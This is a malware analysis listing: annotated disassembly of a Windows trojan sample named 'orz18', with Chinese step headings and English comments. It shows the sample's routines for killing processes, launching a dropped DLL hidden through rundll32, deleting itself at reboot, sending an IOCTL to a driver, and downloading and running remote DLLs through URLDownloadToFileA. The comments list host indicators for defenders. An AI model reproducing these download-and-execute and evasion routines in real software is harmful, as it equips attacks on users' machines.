00415EDE |.75 0A jnz short orz18.00415EEA
00415EE0 |.32C0 xor al,al
00415EE2 |.5E pop esi
00415EE3 |.81C4 30010000add esp,130
00415EE9 |.C3 retn
00415EEA |>8D4424 0C lea eax,dword ptr ss:
00415EEE |.C74424 0C 2801>mov dword ptr ss:,128
00415EF6 |.50 push eax ; /pProcessentry
00415EF7 |.56 push esi ; |hSnapshot
00415EF8 |.E8 F9030000 call orz18.004162F6 ; \Process32First
00415EFD |.85C0 test eax,eax
00415EFF |.0F84 B0000000je orz18.00415FB5
00415F05 |.53 push ebx
00415F06 |.8B1D 98104000mov ebx,dword ptr ds: ;kernel32.OpenProcess
00415F0C |.55 push ebp
00415F0D |.57 push edi
; outer loop: per process; inner loop: ebp indexes the name table
00415F0E |>33ED /xor ebp,ebp
00415F10 |>8BCD |/mov ecx,ebp
00415F12 |.33C0 ||xor eax,eax
00415F14 |.C1E1 04 ||shl ecx,4
00415F17 |.8DB429 ACD5400>||lea esi,dword ptr ds:
00415F1E |.83C9 FF ||or ecx,FFFFFFFF
00415F21 |.8BFE ||mov edi,esi
00415F23 |.F2:AE ||repne scas byte ptr es:
00415F25 |.F7D1 ||not ecx
00415F27 |.49 ||dec ecx
00415F28 |.83F9 04 ||cmp ecx,4
00415F2B |.72 56 ||jb short orz18.00415F83
; one-time in-place decode of the table entry, gated by the byte at 0040D722
00415F2D |.A0 22D74000 ||mov al,byte ptr ds:
00415F32 |.84C0 ||test al,al
00415F34 |.74 09 ||je short orz18.00415F3F
00415F36 |.56 ||push esi
00415F37 |.E8 E4FDFFFF ||call orz18.00415D20 ;//decode data: the process names to kill
00415F3C |.83C4 04 ||add esp,4
00415F3F |>8D5424 3C ||lea edx,dword ptr ss:
00415F43 |.56 ||push esi ; /String2
00415F44 |.52 ||push edx ; |String1
00415F45 |.FF15 40104000||call dword ptr ds: ; \lstrcmpiA
00415F4B |.85C0 ||test eax,eax
00415F4D |.75 34 ||jnz short orz18.00415F83
; matched: index != 0x11 -> set flag only; index == 0x11 -> terminate
00415F4F |.83FD 11 ||cmp ebp,11
00415F52 |.75 37 ||jnz short orz18.00415F8B
00415F54 |.8B4424 20 ||mov eax,dword ptr ss:
00415F58 |.50 ||push eax
00415F59 |.6A 00 ||push 0
00415F5B |.6A 01 ||push 1
00415F5D |.FFD3 ||call ebx
00415F5F |.6A 00 ||push 0 ; /Style = MB_OK|MB_APPLMODAL
00415F61 |.6A 00 ||push 0 ; |Title = NULL
00415F63 |.6A 00 ||push 0 ; |Text = NULL
00415F65 |.6A FD ||push -3 ; |hOwner = FFFFFFFD
00415F67 |.8BF0 ||mov esi,eax ; |
00415F69 |.FF15 24114000||call dword ptr ds: ; \MessageBoxA
00415F6F |.85F6 ||test esi,esi
00415F71 |.74 18 ||je short orz18.00415F8B
00415F73 |.6A 00 ||push 0 ; /ExitCode = 0
00415F75 |.56 ||push esi ; |hProcess
00415F76 |.FF15 9C104000||call dword ptr ds: ; \TerminateProcess
00415F7C |.56 ||push esi ; /hObject
00415F7D |.FF15 AC104000||call dword ptr ds: ; \CloseHandle
00415F83 |>45 ||inc ebp
00415F84 |.83FD 16 ||cmp ebp,16
00415F87 |.^ 7C 87 |\jl short orz18.00415F10
00415F89 |.EB 05 |jmp short orz18.00415F90
; return flag = 1 (a listed name was seen)
00415F8B |>C64424 13 01 |mov byte ptr ss:,1
00415F90 |>8B5424 14 |mov edx,dword ptr ss:
00415F94 |.8D4C24 18 |lea ecx,dword ptr ss:
00415F98 |.51 |push ecx ; /pProcessentry
00415F99 |.52 |push edx ; |hSnapshot
00415F9A |.C605 22D74000 >|mov byte ptr ds:,0 ; |
00415FA1 |.E8 4A030000 |call orz18.004162F0 ; \Process32Next
00415FA6 |.85C0 |test eax,eax
00415FA8 |.^ 0F85 60FFFFFF\jnz orz18.00415F0E
00415FAE |.8B7424 14 mov esi,dword ptr ss:
00415FB2 |.5F pop edi
00415FB3 |.5D pop ebp
00415FB4 |.5B pop ebx
00415FB5 |>56 push esi ; /hObject
00415FB6 |.FF15 AC104000call dword ptr ds: ; \CloseHandle
00415FBC |.8A4424 07 mov al,byte ptr ss:
00415FC0 |.5E pop esi
00415FC1 |.81C4 30010000add esp,130
00415FC7 \.C3 retn
}
18 创建文件 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\12234.dll
00415E7A |.E8 41EAFFFF call orz18.004148C0创建
00415E84 |.E8 D7FEFFFF call orz18.00415D60给文件加MZ
执行 rundll32.exe....C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\12234.dll
; --- Step 18 launch: ShellExecuteA(NULL, "", FileName = rundll32.exe, Parameters = the Temp\12234.dll
; path (per the author's text), NULL, IsShown = 0 = SW_HIDE). The FileName/Parameters buffers are
; built above the quoted lines. rundll32 loading a DLL out of %TEMP% with a hidden window is the
; process-tree indicator for this stage.
00415EA1 |.6A 00 push 0 ; /IsShown = 0
00415EA3 |.6A 00 push 0 ; |DefDir = NULL
00415EA5 |.50 push eax ; |Parameters
00415EA6 |.51 push ecx ; |FileName
00415EA7 |.68 58664100 push orz18.00416658 ; |Operation = ""
00415EAC |.6A 00 push 0 ; |hWnd = NULL
00415EAE |.FF15 E0104000call dword ptr ds: ; \ShellExecuteA
19 通过本进程ID得到 进程结构
{
; --- Step 19: the same Process32First / GetCurrentProcessId / Process32Next walk already listed under
; step 1 (addresses 00415CE3–00415D0D of orz18.00415CA6); the author re-quotes it to show how the
; current process's own PROCESSENTRY32 is located. The comparison is against th32ProcessID at
; [esp+10] (offset from the opcode bytes 394424 10). Process32Next's return value is overwritten by
; the following `call edi` before it can be tested.
00415CE3 |.50 push eax ; /pProcessentry
00415CE4 |.56 push esi ; |hSnapshot
00415CE5 |.E8 0C060000 call orz18.004162F6 ; \Process32First
00415CEA |.85C0 test eax,eax
00415CEC |.74 21 je short orz18.00415D0F
00415CEE |.8B3D 5C104000mov edi,dword ptr ds: ;kernel32.GetCurrentProcessId
00415CF4 |.FFD7 call edi ; [GetCurrentProcessId
00415CF6 |.394424 10 cmp dword ptr ss:,eax
00415CFA |.74 13 je short orz18.00415D0F
00415CFC |>8D4C24 08 /lea ecx,dword ptr ss:
00415D00 |.51 |push ecx ; /pProcessentry
00415D01 |.56 |push esi ; |hSnapshot
00415D02 |.E8 E9050000 |call orz18.004162F0 ; \Process32Next
00415D07 |.FFD7 |call edi ;kernel32.GetCurrentProcessId
00415D09 |.394424 10 |cmp dword ptr ss:,eax
00415D0D |.^ 75 ED \jnz short orz18.00415CFC
}
20
{
; --- orz18.0041602F (step 20): post-install sequence, no arguments, returns 0.
; GetModuleFileNameA(NULL) → own path (0x104-byte buffer at ebp-0x108); Sleep(0xEA60 = 60 s);
; MessageBoxA(-1, "...", "", 0) — a modal box, so an unattended sandbox run stalls here unless the box
; is auto-dismissed; CreateThread(orz18.00415730) = the downloader thread listed under step 21;
; MoveFileExA(own path, NULL, MOVEFILE_DELAY_UNTIL_REBOOT = 4) = delete self at next boot, which
; leaves a PendingFileRenameOperations entry a responder can look for; orz18.00415B70 (author:
; raises process privileges); orz18.00415FD0 with the Temp\1696 path — the file dropped in step 3;
; then CreateFileA on the device name "\\.\safebreas" (GENERIC_READ, OPEN_EXISTING) and, if it opened,
; DeviceIoControl(code 0x22001C, in-buffer 0x3200 bytes at 004101A4, no out-buffer). 0x22001C decodes
; as CTL_CODE(FILE_DEVICE_UNKNOWN, function 7, METHOD_BUFFERED, FILE_ANY_ACCESS).
; The device name, the IOCTL and the 1696 drop together point at a kernel component — presumably what
; 00415FD0 loads — but that is not shown on this page. The device name and IOCTL are usable as
; host indicators. CloseHandle is reached even on the INVALID_HANDLE_VALUE path (harmless).
0041602F /$55 push ebp
00416030 |.8BEC mov ebp,esp
00416032 |.81EC 08010000sub esp,108
00416038 |.56 push esi
00416039 |.57 push edi
0041603A |.8D85 F8FEFFFFlea eax,dword ptr ss:
00416040 |.68 04010000 push 104 ; /BufSize = 104 (260.)
00416045 |.33F6 xor esi,esi ; |
00416047 |.50 push eax ; |PathBuffer
00416048 |.56 push esi ; |hModule => NULL
00416049 |.FF15 6C104000call dword ptr ds: ; \GetModuleFileNameA
0041604F |.68 60EA0000 push 0EA60 ; /Timeout = 60000. ms
00416054 |.FF15 88104000call dword ptr ds: ; \Sleep
0041605A |.56 push esi ; /Style => MB_OK|MB_APPLMODAL
0041605B |.68 58664100 push orz18.00416658 ; |Title = ""
00416060 |.68 DC434100 push orz18.004143DC ; |Text = "..."
00416065 |.6A FF push -1 ; |hOwner = FFFFFFFF
00416067 |.FF15 24114000call dword ptr ds: ; \MessageBoxA
0041606D |.56 push esi ; /pThreadId => NULL
0041606E |.56 push esi ; |CreationFlags => 0
0041606F |.56 push esi ; |pThreadParm => NULL
00416070 |.68 30574100 push orz18.00415730 ; |ThreadFunction = orz18.00415730
00416075 |.56 push esi ; |StackSize => 0
00416076 |.56 push esi ; |pSecurity => NULL
00416077 |.FF15 34104000call dword ptr ds: ; \CreateThread
; self-delete at next reboot: MoveFileExA(self, NULL, MOVEFILE_DELAY_UNTIL_REBOOT)
0041607D |.6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT
0041607F |.8D85 F8FEFFFFlea eax,dword ptr ss: ; |
00416085 |.56 push esi ; |NewName => NULL //
00416086 |.50 push eax ; |ExistingName
00416087 |.FF15 50104000call dword ptr ds: ; \MoveFileExA
0041608D |.E8 DEFAFFFF call orz18.00415B70 //raise process privileges
00416092 |.68 48644100 push orz18.00416448 ;ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1696"
00416097 |.E8 34FFFFFF call orz18.00415FD0
0041609C |.59 pop ecx
; open the device and send one IOCTL with a 0x3200-byte input buffer from the image
0041609D |.56 push esi ; /hTemplateFile => NULL
0041609E |.56 push esi ; |Attributes => 0
0041609F |.6A 03 push 3 ; |Mode = OPEN_EXISTING
004160A1 |.56 push esi ; |pSecurity => NULL
004160A2 |.56 push esi ; |ShareMode => 0
004160A3 |.68 00000080 push 80000000 ; |Access = GENERIC_READ
004160A8 |.68 CC434100 push orz18.004143CC ; |FileName = "\\.\safebreas"
004160AD |.FF15 A0104000call dword ptr ds: ; \CreateFileA
004160B3 |.8BF8 mov edi,eax
004160B5 |.83FF FF cmp edi,-1
004160B8 |.74 1D je short orz18.004160D7
004160BA |.8D45 FC lea eax,dword ptr ss:
004160BD |.56 push esi ; /pOverlapped => NULL
004160BE |.50 push eax ; |pBytesReturned
004160BF |.56 push esi ; |OutBufferSize => 0
004160C0 |.56 push esi ; |OutBuffer => NULL
004160C1 |.68 00320000 push 3200 ; |InBufferSize = 3200 (12800.)
004160C6 |.68 A4014100 push orz18.004101A4 ; |InBuffer = orz18.004101A4
004160CB |.68 1C002200 push 22001C ; |IoControlCode = 22001C
004160D0 |.57 push edi ; |hDevice
004160D1 |.FF15 68104000call dword ptr ds: ; \DeviceIoControl
004160D7 |>57 push edi ; /hObject
004160D8 |.FF15 AC104000call dword ptr ds: ; \CloseHandle
004160DE |.5F pop edi
004160DF |.33C0 xor eax,eax
004160E1 |.5E pop esi
004160E2 |.C9 leave
004160E3 \.C3 retn
}
21 线程函数 生成随机的 DLL 文件 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\5dc2de.dll
call orz18.00414920 下载地址被解密
00416070 |.68 30574100 push orz18.00415730 ; |ThreadFunction = orz18.00415730
{
; --- orz18.00415730 thread (step 21) — stdcall with one unused parameter (retn 4), returns 0.
; Builds "<GetTempPathA()><GetTickCount() in hex>.dll" with wsprintfA("%s%x.dll") into the global
; buffer at 0041633C (the same buffer the author shows as Temp\5dc2de.dll under step 22), hands it to
; orz18.00414414 and returns 0 if that yields al = 0.
; Otherwise: orz18.00414920 on the blobs at 00414008 and 00413FA4 (the second address from the
; truncated opcode bytes; author: URL decryption), orz18.00415150 (author: downloads the trojan),
; Sleep(0xC350 = 50 s), orz18.00414920 on 00414078, orz18.00415550, orz18.00414B0D, Sleep(500 ms),
; CreateThread(orz18.004155B3), Sleep(500 ms). The dword at 00414148 then sets an extra delay:
; >= 0x270F → 30 × 60 s; 0 < value < 0x270F → value × 60 s; <= 0 → none.
; Finally orz18.004149B0(0041414C) and orz18.00414B40(0041414C, 0x42, "aaa") — the stack slot pushed
; for 004149B0 is overwritten with the "aaa" pointer at 00415819 instead of being popped, then the
; three-argument frame is cleaned with add esp,0C. The helpers' purposes are the author's notes only;
; the long fixed delays are worth accounting for when running the sample in a time-limited sandbox.
00415730 /.55 push ebp
00415731 |.8BEC mov ebp,esp
00415733 |.81EC 04010000sub esp,104
00415739 |.8D85 FCFEFFFFlea eax,dword ptr ss:
0041573F |.56 push esi
00415740 |.50 push eax ; /Buffer
00415741 |.68 04010000 push 104 ; |BufSize = 104 (260.)
00415746 |.FF15 2C104000call dword ptr ds: ; \GetTempPathA
0041574C |.FF15 28104000call dword ptr ds: ; [GetTickCount
00415752 |.50 push eax ; /<%x>
00415753 |.8D85 FCFEFFFFlea eax,dword ptr ss: ; |
00415759 |.50 push eax ; |<%s>
0041575A |.BE 3C634100 mov esi,orz18.0041633C ; |
0041575F |.68 38434100 push orz18.00414338 ; |Format = "%s%x.dll"
00415764 |.56 push esi ; |s => orz18.0041633C
00415765 |.FF15 10114000call dword ptr ds: ; \wsprintfA
0041576B |.56 push esi
0041576C |.E8 A3ECFFFF call orz18.00414414
00415771 |.83C4 14 add esp,14
00415774 |.84C0 test al,al
00415776 |.75 07 jnz short orz18.0041577F
00415778 |.33C0 xor eax,eax
0041577A |.E9 B0000000 jmp orz18.0041582F
0041577F |>53 push ebx
00415780 |.57 push edi
00415781 |.68 08404100 push orz18.00414008
00415786 |.E8 95F1FFFF call orz18.00414920
0041578B |.C70424 A43F410>mov dword ptr ss:,orz18.0041>
00415792 |.E8 89F1FFFF call orz18.00414920 //download URL decrypted
00415797 |.E8 B4F9FFFF call orz18.00415150 //download the trojan
0041579C |.8B35 88104000mov esi,dword ptr ds: ; |kernel32.Sleep
004157A2 |.C70424 50C3000>mov dword ptr ss:,0C350 ; |
004157A9 |.FFD6 call esi ; \Sleep
004157AB |.68 78404100 push orz18.00414078
004157B0 |.E8 6BF1FFFF call orz18.00414920
004157B5 |.59 pop ecx
004157B6 |.E8 95FDFFFF call orz18.00415550
004157BB |.E8 4DF3FFFF call orz18.00414B0D
004157C0 |.BF F4010000 mov edi,1F4
004157C5 |.57 push edi ; /Timeout => 500. ms
004157C6 |.FFD6 call esi ; \Sleep
004157C8 |.33DB xor ebx,ebx
004157CA |.53 push ebx ; /pThreadId => NULL
004157CB |.53 push ebx ; |CreationFlags => 0
004157CC |.53 push ebx ; |pThreadParm => NULL
004157CD |.68 B3554100 push orz18.004155B3 ; |ThreadFunction = orz18.004155B3
004157D2 |.53 push ebx ; |StackSize => 0
004157D3 |.53 push ebx ; |pSecurity => NULL
004157D4 |.FF15 34104000call dword ptr ds: ; \CreateThread
004157DA |.57 push edi ; /Timeout => 500. ms
004157DB |.FFD6 call esi ; \Sleep
; configurable delay from the dword at 00414148, in minutes
004157DD |.A1 48414100 mov eax,dword ptr ds:
004157E2 |.3D 0F270000 cmp eax,270F
004157E7 |.7D 18 jge short orz18.00415801
004157E9 |.33FF xor edi,edi
004157EB |.3BC3 cmp eax,ebx
004157ED |.7E 1F jle short orz18.0041580E
004157EF |>68 60EA0000 /push 0EA60
004157F4 |.FFD6 |call esi
004157F6 |.47 |inc edi
004157F7 |.3B3D 48414100|cmp edi,dword ptr ds:
004157FD |.^ 7C F0 \jl short orz18.004157EF
004157FF |.EB 0D jmp short orz18.0041580E
00415801 |>6A 1E push 1E
00415803 |.5F pop edi
00415804 |>68 60EA0000 /push 0EA60
00415809 |.FFD6 |call esi
0041580B |.4F |dec edi
0041580C |.^ 75 F6 \jnz short orz18.00415804
; 00414B40(0041414C, 0x42, "aaa") — see the download routine under step 22
0041580E |>BE 4C414100 mov esi,orz18.0041414C
00415813 |.56 push esi
00415814 |.E8 97F1FFFF call orz18.004149B0
00415819 |.C70424 F842410>mov dword ptr ss:,orz18.0041>;ASCII "aaa"
00415820 |.6A 42 push 42
00415822 |.56 push esi
00415823 |.E8 18F3FFFF call orz18.00414B40
00415828 |.83C4 0C add esp,0C
0041582B |.33C0 xor eax,eax
0041582D |.5F pop edi
0041582E |.5B pop ebx
0041582F |>5E pop esi
00415830 |.C9 leave
00415831 \.C2 0400 retn 4
}
22 把txt文件下载到C:\windows\system32\ 名字 asdfasdf
{
; --- orz18.00414B40(url, tickDelta, name) — cdecl; arguments at [ebp+8] / [ebp+C] / [ebp+10]
; (offsets from the opcode bytes, bracket contents lost). Download helper around
; urlmon.URLDownloadToFileA. Every attempt's HRESULT is stored in the dword at 00416440 and S_OK (0)
; ends the retry loop. Debug-looking MessageBoxA calls are left in ("iiiiiooooo"/"pppppppp" up front,
; and url/target before the last branch's loop).
;  1. ext = strrchr(url, '.'); no '.' → return.
;  2. strlen(name) > 4 → up to 0x64 (100) attempts with Sleep(5 s) between; target = name as given.
;  3. ext is "ini" or "txt" → target = GetSystemDirectoryA() + "\asdfasdf" (assembled with the rep movs
;     pairs below), up to 100 attempts with Sleep(12 s). Writing under System32 needs admin rights.
;  4. otherwise → target = wsprintfA("%s%d", GetTempPathA(), GetTickCount() + tickDelta), up to 0x1E (30)
;     attempts with Sleep(1 s); when the loop did not exhaust its 30 tries, orz18.00414A30(target,
;     0041633C) runs the file (author's note; its first lines are quoted under step 23).
; Returns nothing meaningful (eax is whatever the last call left). The "asdfasdf" name under System32
; and digit-only file names in %TEMP% are the on-disk indicators from this routine.
00414B40 /$55 push ebp
00414B41 |.8BEC mov ebp,esp
00414B43 |.81EC 0C020000sub esp,20C
00414B49 |.53 push ebx
00414B4A |.56 push esi
00414B4B |.57 push edi
00414B4C |.6A 2E push 2E ; /c = 2E('.')
00414B4E |.FF75 08 push dword ptr ss: ; |s
00414B51 |.E8 BE170000 call orz18.00416314 ; \strrchr
00414B56 |.8B35 24114000mov esi,dword ptr ds: ;USER32.MessageBoxA
00414B5C |.59 pop ecx
00414B5D |.59 pop ecx
00414B5E |.33DB xor ebx,ebx
00414B60 |.53 push ebx ; /Style => MB_OK|MB_APPLMODAL
00414B61 |.68 10424100 push orz18.00414210 ; |Title = "pppppppp"
00414B66 |.68 04424100 push orz18.00414204 ; |Text = "iiiiiooooo"
00414B6B |.6A FA push -6 ; |hOwner = FFFFFFFA
00414B6D |.8945 FC mov dword ptr ss:,eax ; |
00414B70 |.FFD6 call esi ; \MessageBoxA
00414B72 |.395D FC cmp dword ptr ss:,ebx
00414B75 |.0F84 A2010000je orz18.00414D1D
; [ebp-4] = extension (past the '.'); ecx = strlen(name)
00414B7B |.8B7D 10 mov edi,dword ptr ss:
00414B7E |.FF45 FC inc dword ptr ss:
00414B81 |.83C9 FF or ecx,FFFFFFFF
00414B84 |.33C0 xor eax,eax
00414B86 |.F2:AE repne scas byte ptr es:
00414B88 |.F7D1 not ecx
00414B8A |.49 dec ecx
00414B8B |.83F9 04 cmp ecx,4
00414B8E |.76 34 jbe short orz18.00414BC4
; case 2: download to the caller-supplied name, 100 tries, 5 s apart
00414B90 |.33F6 xor esi,esi
00414B92 |>53 /push ebx
00414B93 |.53 |push ebx
00414B94 |.FF75 10 |push dword ptr ss:
00414B97 |.FF75 08 |push dword ptr ss:
00414B9A |.53 |push ebx
00414B9B |.FF15 50654100|call dword ptr ds: ;urlmon.URLDownloadToFileA
00414BA1 |.3BC3 |cmp eax,ebx
00414BA3 |.A3 40644100 |mov dword ptr ds:,eax
00414BA8 |.0F84 6F010000|je orz18.00414D1D
00414BAE |.68 88130000 |push 1388 ; /Timeout = 5000. ms
00414BB3 |.FF15 88104000|call dword ptr ds: ; \Sleep
00414BB9 |.46 |inc esi
00414BBA |.83FE 64 |cmp esi,64
00414BBD |.^ 72 D3 \jb short orz18.00414B92
00414BBF |.E9 59010000 jmp orz18.00414D1D
; case 3 test: extension "ini" or "txt"
00414BC4 |>68 B0424100 push orz18.004142B0 ; /s2 = "ini"
00414BC9 |.FF75 FC push dword ptr ss: ; |s1
00414BCC |.E8 5F170000 call orz18.00416330 ; \_stricmp
00414BD1 |.59 pop ecx
00414BD2 |.85C0 test eax,eax
00414BD4 |.59 pop ecx
00414BD5 |.74 17 je short orz18.00414BEE
00414BD7 |.68 AC424100 push orz18.004142AC ; /s2 = "txt"
00414BDC |.FF75 FC push dword ptr ss: ; |s1
00414BDF |.E8 4C170000 call orz18.00416330 ; \_stricmp
00414BE4 |.59 pop ecx
00414BE5 |.85C0 test eax,eax
00414BE7 |.59 pop ecx
00414BE8 |.0F85 A1000000jnz orz18.00414C8F
; case 3: target = system directory + "\asdfasdf" (inline strcat via two rep movs pairs)
00414BEE |>8D85 F4FDFFFFlea eax,dword ptr ss:
00414BF4 |.68 04010000 push 104 ; /BufSize = 104 (260.)
00414BF9 |.50 push eax ; |Buffer
00414BFA |.FF15 30104000call dword ptr ds: ; \GetSystemDirectoryA
00414C00 |.BF A0424100 mov edi,orz18.004142A0 ;ASCII "\asdfasdf"
00414C05 |.83C9 FF or ecx,FFFFFFFF
00414C08 |.33C0 xor eax,eax
00414C0A |.8D95 F4FDFFFFlea edx,dword ptr ss:
00414C10 |.F2:AE repne scas byte ptr es:
00414C12 |.F7D1 not ecx
00414C14 |.2BF9 sub edi,ecx
00414C16 |.8BF7 mov esi,edi
00414C18 |.8BFA mov edi,edx
00414C1A |.8BD1 mov edx,ecx
00414C1C |.83C9 FF or ecx,FFFFFFFF
00414C1F |.F2:AE repne scas byte ptr es:
00414C21 |.8BCA mov ecx,edx
00414C23 |.4F dec edi
00414C24 |.C1E9 02 shr ecx,2
00414C27 |.F3:A5 rep movs dword ptr es:,dword>
00414C29 |.8BCA mov ecx,edx
00414C2B |.8D95 F8FEFFFFlea edx,dword ptr ss:
00414C31 |.83E1 03 and ecx,3
00414C34 |.F3:A4 rep movs byte ptr es:,byte p>
00414C36 |.8DBD F4FDFFFFlea edi,dword ptr ss:
00414C3C |.83C9 FF or ecx,FFFFFFFF
00414C3F |.F2:AE repne scas byte ptr es:
00414C41 |.F7D1 not ecx
00414C43 |.2BF9 sub edi,ecx
00414C45 |.8BC1 mov eax,ecx
00414C47 |.8BF7 mov esi,edi
00414C49 |.8BFA mov edi,edx
00414C4B |.C1E9 02 shr ecx,2
00414C4E |.F3:A5 rep movs dword ptr es:,dword>
00414C50 |.8BC8 mov ecx,eax
00414C52 |.83E1 03 and ecx,3
00414C55 |.F3:A4 rep movs byte ptr es:,byte p>
; 100 tries, 12 s apart
00414C57 |.33F6 xor esi,esi
00414C59 |>53 /push ebx
00414C5A |.8D85 F8FEFFFF|lea eax,dword ptr ss:
00414C60 |.53 |push ebx
00414C61 |.50 |push eax ;C:\windows\system32\asdfasdf
00414C62 |.FF75 08 |push dword ptr ss:
00414C65 |.53 |push ebx
00414C66 |.FF15 50654100|call dword ptr ds: ;urlmon.URLDownloadToFileA
00414C6C |.3BC3 |cmp eax,ebx
00414C6E |.A3 40644100 |mov dword ptr ds:,eax
00414C73 |.0F84 A4000000|je orz18.00414D1D
00414C79 |.68 E02E0000 |push 2EE0 ; /Timeout = 12000. ms
00414C7E |.FF15 88104000|call dword ptr ds: ; \Sleep
00414C84 |.46 |inc esi
00414C85 |.83FE 64 |cmp esi,64
00414C88 |.^ 72 CF \jb short orz18.00414C59
00414C8A |.E9 8E000000 jmp orz18.00414D1D
; case 4: target = "%s%d" of temp path and GetTickCount() + tickDelta
00414C8F |>8D85 F4FDFFFFlea eax,dword ptr ss:
00414C95 |.50 push eax ; /Buffer
00414C96 |.68 04010000 push 104 ; |BufSize = 104 (260.)
00414C9B |.FF15 2C104000call dword ptr ds: ; \GetTempPathA
00414CA1 |.FF15 28104000call dword ptr ds: ; [GetTickCount
00414CA7 |.0345 0C add eax,dword ptr ss:
00414CAA |.50 push eax ; /<%d>
00414CAB |.8D85 F4FDFFFFlea eax,dword ptr ss: ; |
00414CB1 |.50 push eax ; |<%s>
00414CB2 |.8D85 F8FEFFFFlea eax,dword ptr ss: ; |
00414CB8 |.68 98424100 push orz18.00414298 ; |Format = "%s%d"
00414CBD |.50 push eax ; |s
00414CBE |.FF15 10114000call dword ptr ds: ; \wsprintfA
00414CC4 |.83C4 10 add esp,10
; MessageBoxA(-8, text = url, caption = target, 0)
00414CC7 |.8D85 F8FEFFFFlea eax,dword ptr ss:
00414CCD |.53 push ebx
00414CCE |.50 push eax
00414CCF |.FF75 08 push dword ptr ss:
00414CD2 |.6A F8 push -8
00414CD4 |.FFD6 call esi
; 30 tries, 1 s apart
00414CD6 |.33F6 xor esi,esi
00414CD8 |>53 /push ebx
00414CD9 |.8D85 F8FEFFFF|lea eax,dword ptr ss:
00414CDF |.53 |push ebx
00414CE0 |.50 |push eax
00414CE1 |.FF75 08 |push dword ptr ss:
00414CE4 |.53 |push ebx
00414CE5 |.FF15 50654100|call dword ptr ds: ;urlmon.URLDownloadToFileA
00414CEB |.3BC3 |cmp eax,ebx
00414CED |.A3 40644100 |mov dword ptr ds:,eax
00414CF2 |.74 11 |je short orz18.00414D05
00414CF4 |.68 E8030000 |push 3E8 ; /Timeout = 1000. ms
00414CF9 |.FF15 88104000|call dword ptr ds: ; \Sleep
00414CFF |.46 |inc esi
00414D00 |.83FE 1E |cmp esi,1E
00414D03 |.^ 72 D3 |jb short orz18.00414CD8
; esi == 0x1E means all 30 attempts failed: skip running the file
00414D05 |>83FE 1E cmp esi,1E
00414D08 |.74 13 je short orz18.00414D1D
00414D0A |.8D85 F8FEFFFFlea eax,dword ptr ss:
00414D10 |.50 push eax
00414D11 |.68 3C634100 push orz18.0041633C ;ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\5dc2de.dll"
00414D16 |.E8 15FDFFFF call orz18.00414A30 //run the downloaded program
00414D1B |.59 pop ecx
00414D1C |.59 pop ecx
00414D1D |>5F pop edi
00414D1E |.5E pop esi
00414D1F |.5B pop ebx
00414D20 |.C9 leave
00414D21 \.C3 retn
}
23 下载过程
{
; Fragment of the routine at 00414A30 (its first byte and its tail are not in
; this listing). It is called at 00414D16 with the path of the file that was
; just downloaded ("...\Temp\5dc2de.dll"): the file is loaded as a DLL and its
; "Winext" export is resolved, which the author identifies as the download routine.
00414A31 FF7424 08 push dword ptr ss: ; [esp+8] = path argument (operand text lost in extraction; from opcode FF 74 24 08)
00414A35 FF15 80104000 call dword ptr ds: ; kernel32.LoadLibraryA
00414A3B 8BF0 mov esi,eax ; esi = module handle (0 on failure)
00414A3D 85F6 test esi,esi
00414A3F 74 1E je short orz18.00414A5F ; load failed -> skip (target not shown)
00414A41 68 88424100 push orz18.00414288 ; ASCII "Winext" // export name; author's note: the download routine
00414A46 56 push esi
00414A47 FF15 84104000 call dword ptr ds: ; kernel32.GetProcAddress
00414A4D 85C0 test eax,eax ; export resolved? (what follows is not shown)
}
24
{
; Fragment (enclosing routine starts and ends outside this listing).
; esi is presumably 0 here, since every NULL-style argument is pushed from it
; — confirm against the preceding code. edi holds a function pointer set
; earlier; the author annotates that call as terminating thunder5.exe and cmd.exe.
; The thread body at 00414461 is not part of this listing.
00416235 |.56 push esi ; /pThreadId
00416236 |.56 push esi ; |CreationFlags
00416237 |.56 push esi ; |pThreadParm
00416238 |.68 61444100 push orz18.00414461 ; |ThreadFunction = orz18.00414461
0041623D |.56 push esi ; |StackSize
0041623E |.56 push esi ; |pSecurity
0041623F |.FF15 34104000call dword ptr ds: ; \CreateThread
00416245 |.53 push ebx
00416246 |.FFD7 call edi / / author's note: terminates thunder5.exe and cmd.exe (edi's target is not visible here)
00416248 |.E8 E2FDFFFF call orz18.0041602F ; -> the "finish" routine listed under 25
}
00416248 |.E8 E2FDFFFF call orz18.0041602F
{
25
; sub_0041602F — author's section 25, the last stage of the installer.
; No arguments are read; esi is zeroed once and reused for every NULL/0 argument.
; Visible sequence:
;   1. GetModuleFileNameA(NULL, [ebp-108], 0x104)   -> own executable path
;   2. Sleep(60000), then MessageBoxA(hOwner=-1, "...", "", MB_OK)
;   3. CreateThread(00415730)                        -> thread body not in this listing
;   4. MoveFileExA(own path, NULL, MOVEFILE_DELAY_UNTIL_REBOOT)
;        with NewName == NULL this flag schedules deletion of the running
;        executable at the next reboot (self-removal)
;   5. call 00415B70 (not shown); call 00415FD0("...\Temp\1696") -> service "zg", see 26
;   6. CreateFileA("\\.\safebreas") and, if it opens, DeviceIoControl(0x22001C)
;      with the 0x3200-byte buffer at 004101A4 as input
; Returns eax = 0.
; Detection notes, limited to what is visible: the device name "\\.\safebreas",
; the temp file "...\Temp\1696", the service name "zg" and the 60 s delay
; followed by a message box are the observable artifacts of this stage.
0041602F /$55 push ebp
00416030 |.8BEC mov ebp,esp
00416032 |.81EC 08010000sub esp,108 ; [ebp-108] = 0x104-byte path buffer, [ebp-4] = bytes-returned dword
00416038 |.56 push esi
00416039 |.57 push edi
0041603A |.8D85 F8FEFFFFlea eax,dword ptr ss:
00416040 |.68 04010000 push 104 ; /BufSize = 104 (260.)
00416045 |.33F6 xor esi,esi ; |
00416047 |.50 push eax ; |PathBuffer
00416048 |.56 push esi ; |hModule => NULL
00416049 |.FF15 6C104000call dword ptr ds: ; \GetModuleFileNameA
0041604F |.68 60EA0000 push 0EA60 ; /Timeout = 60000. ms
00416054 |.FF15 88104000call dword ptr ds: ; \Sleep ; one-minute stall before anything user-visible happens
0041605A |.56 push esi ; /Style => MB_OK|MB_APPLMODAL
0041605B |.68 58664100 push orz18.00416658 ; |Title = ""
00416060 |.68 DC434100 push orz18.004143DC ; |Text = "..."
00416065 |.6A FF push -1 ; |hOwner = FFFFFFFF
